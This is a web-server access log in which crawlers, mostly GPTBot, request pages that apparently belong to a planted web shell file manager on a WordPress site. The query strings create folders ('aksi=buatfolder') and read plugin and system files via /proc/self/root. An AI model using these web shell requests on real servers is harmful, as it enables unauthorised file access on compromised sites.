51.222.253.18 - - [15/Jun/2025:08:06:48 -0400] "GET /sitemap-item-1704.xml HTTP/1.1" 200 12501 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
20.171.207.175 - - [15/Jun/2025:08:06:48 -0400] "GET /aquilegia836469328.shtml?aksi=buatfolder&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Fadmin%2Fpartials%2Fi18ns HTTP/1.1" 200 2142 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:08:06:49 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8%2Fxfs_spaceman.8.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8 HTTP/1.1" 200 3597 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:08:06:49 -0400] "GET /revile231955198.shtml?aksi=buatfolder&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Fincludes HTTP/1.1" 200 2117 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:08:06:50 -0400] "GET /aquilegia836469328.shtml?aksi=buatfolder&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Fadmin HTTP/1.1" 200 2121 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:08:06:50 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8%2Fmkswap.8.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8 HTTP/1.1" 200 4154 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:08:06:52 -0400] "GET /cuskin836627940.shtml?path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Fadmin%2Fpartials HTTP/1.1" 200 2622 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:08:06:52 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8%2Fmysqld.8.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8 HTTP/1.1" 200 3480 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:08:06:53 -0400] "GET /cuskin836627940.shtml?path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Fadmin%2Fbundles HTTP/1.1" 200 2478 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:08:06:53 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8%2Fnft.8.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8 HTTP/1.1" 200 34298 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.222.253.4 - - [15/Jun/2025:08:06:53 -0400] "GET /sitemap-item-1730.xml HTTP/1.1" 200 12454 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
20.171.207.175 - - [15/Jun/2025:08:06:54 -0400] "GET /revile231955198.shtml?path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Fadmin%2Fpartials%2Fi18ns HTTP/1.1" 200 2198 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:08:06:54 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8%2Fxfs_mdrestore.8.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8 HTTP/1.1" 200 2816 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:08:06:55 -0400] "GET /revile231955198.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Fadmin%2Fpartials%2Fdisqus-admin-partial.php&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Fadmin%2Fpartials HTTP/1.1" 200 2218 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
